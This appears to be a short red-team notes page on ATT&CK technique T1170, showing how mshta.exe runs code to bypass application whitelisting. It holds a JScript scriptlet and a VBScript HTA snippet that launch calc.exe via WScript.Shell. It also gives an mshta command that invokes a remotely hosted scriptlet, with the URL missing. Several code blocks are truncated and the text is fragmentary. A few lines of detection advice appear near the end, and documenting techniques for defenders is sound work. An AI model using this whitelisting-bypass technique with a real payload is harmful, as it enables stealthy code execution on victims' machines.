T1170: MSHTA

Last updated 4 months ago

MSHTA code execution - bypass application whitelisting.


Writing a scriptlet file that will launch calc.exe when invoked:
<?XML version="1.0"?>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<method name="Exec"></method>
<script language="JScript">
function Exec() {
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

Invoking the scriptlet file hosted remotely:

# from powershell
/cmd /c mshta.exe javascript:a=(GetObject("script:")).Exec();close();


As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:

As a defender, look at sysmon logs for mshta establishing network connections:

Also, suspicious commandlines:


The hta file can be invoked like so:


or by navigating to the file itself, launching it and clicking run:
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
Nothing to see here..